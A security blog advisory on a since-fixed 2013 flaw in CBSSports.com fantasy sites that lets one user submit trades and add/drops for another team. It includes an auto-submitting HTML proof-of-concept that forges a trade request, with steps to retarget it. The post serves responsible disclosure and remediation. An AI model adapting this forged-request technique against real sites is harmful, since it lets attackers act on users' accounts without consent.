Cyber Security Technical Blog

CBSSports.com Horizontal Access Control Bypass (Trades & Add/Drop)

Written by Christopher Emerson | Oct 11, 2024 5:43:11 PM

Summary
=========
The CBSSports.com fantasy sports sites do not properly
enforce access control between user accounts at the same privilege level within
the application. This behavior could be leveraged by an attacker to send Trade and
Add/Drop requests on behalf of an opposing team without the opposing team’s
interaction, knowledge, or consent.

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 01/09/2013
Vendor fixed: 02/22/2013
Credit: Christopher Emerson of White Oak Security (https://www.whiteoaksecurity.com/)

 Affected Products
=================
Confirmed on CBS Sports Fantasy Football and Fantasy Baseball
properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to
perform sensitive actions without verifying that the user actually invoked the
actions.  In this instance, a
CBSSports.com user can successfully submit Trade and Add/Drop requests to the
application on behalf of other legitimate users.

Impact
=======
A malicious user could execute Trade and Add/Drop requests
on behalf of a legitimate user.

 Solution
======== 
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept 
================
The following HTML code is included as a Proof-of-Concept
(PoC). The PoC is designed to trick a team into offering Victor Martinez in a
trade without the player’s owner initiating the request.  The code below should to be copied and pasted
into an HTML file, although the actual exploit can be hosted on the Internet
for ease of exploit.

To reproduce this in your own environment, the PoC will need
to be modified as detailed below.

<html>
<body>
<form name="XSRF_Trade_Player" action="http://vanilla.baseball.cbssports.com/api/league/transactions/trade" onsubmit="window.close()" method="POST"> <input type="hidden" name="payload" value="&#123;&quot;team&#95;from&quot;&#58;&quot;8&quot;&#44;&quot;team&#95;to&quot;&#58;&quot;6&quot;&#44;&quot;comment&quot;&#58;&quot;&quot;&#44;&quot;players&quot;&#58;&#91;&quot;367942&#58;8&#58;6&quot;&#93;&#44;&quot;draft&#95;picks&quot;&#58;&#91;&#93;&#125;"/>
<input type="hidden" name="resultFormat" value="json" />
<input type="hidden" name="responseFormat" value="json" />
<input type="submit" value="Submit form" />
</form> <script> document.XSRF_Trade_Player.submit(); </script>
</body>
</html>

1. Change URL to the target league.
2. Change the value of your team’s ID number to the opposing team’s ID number (‘8’ in the example above).
3. Change the value of the opposing team’s ID number to your team’s ID number. (‘6’ in the example above).
4. Change the value to the player’s ID number (e.g., 367942 for Victor Martinez).

The attacker can open this file from his or her own PC.  When the file is opened, CBSSports.com will process the JSON request without confirming if the user is authorized to make the request.  

Figure 1. Opponent’s team containing Victor Martinez before the horizontal access control exploit. Figure 2. Attacker’s team’s trade page displaying the no current trade offers.   Figure 3. Capture of the request that is sent when the PoC is executed.   Figure 4. Capture of the response that is sent when the PoC is executed. Figure 5. Attacker’s team’s trade page displaying the unauthorized trade offer from the opponent’s team.

Disclosure Timeline
==================
January 9, 2013: Disclosed to vendor (CBS Corporation).
January 10, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
February 26, 2013: Confirmed successful vendor remediations.
September 26, 2013: Received vendor’s Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly.